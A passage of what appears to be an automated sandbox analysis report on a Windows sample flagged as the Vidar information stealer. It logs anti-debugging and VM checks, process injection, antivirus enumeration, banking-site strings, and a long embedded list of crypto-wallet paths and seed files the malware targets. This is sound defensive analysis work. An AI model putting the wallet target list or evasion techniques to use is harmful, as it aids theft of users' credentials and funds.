Code function: 2_2_00935182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_00935182

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00930F8F GetSystemInfo,wsprintfA,

2_2_00930F8F

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_0093D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_0093D1A8

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_00938ADE

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_009214AD mov eax, dword ptr fs:[00000030h]	2_2_009214AD
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092148A mov eax, dword ptr fs:[00000030h]	2_2_0092148A
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_009214A2 mov eax, dword ptr fs:[00000030h]	2_2_009214A2
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00938726 mov eax, dword ptr fs:[00000030h]	2_2_00938726
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00938725 mov eax, dword ptr fs:[00000030h]	2_2_00938725

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_009310EE GetProcessHeap,HeapAlloc,GlobalMemoryStatusEx,wsprintfA,

2_2_009310EE

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0093D1A8
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093DB1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0093DB1C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_009477BE SetUnhandledExceptionFilter,	2_2_009477BE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6CB8AC62

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_0092F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

2_2_0092F51F

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Memory written: C:\Users\user\Desktop\7ZthFNAqYp.exe base: 920000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_0093247D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00932554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_00932554

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_6CBD4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

2_2_6CBD4760

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_6CAB1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

2_2_6CAB1C30

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_0092119E cpuid

2_2_0092119E

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	2_2_00930DB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetLocaleInfoA,	2_2_0094E834
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0094B25C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	2_2_0094B3F8
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	2_2_00949BE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	2_2_0094B351
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	2_2_0094ACD0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	2_2_0094B453
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	2_2_00945573
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	2_2_00949EFE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	2_2_0094E6FF
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: EnumSystemLocalesA,	2_2_0094B6E6
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	2_2_0094B624
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	2_2_0094762C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	2_2_0094B7B3
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_0094B710
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_00947706
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_00948F54
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_0094B777

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 0_2_005E43A3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_005E43A3

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00930C28 GetProcessHeap,HeapAlloc,GetUserNameA,

2_2_00930C28

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00930D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_00930D03

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_6CAD8390 NSS_GetVersion,

2_2_6CAD8390

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia 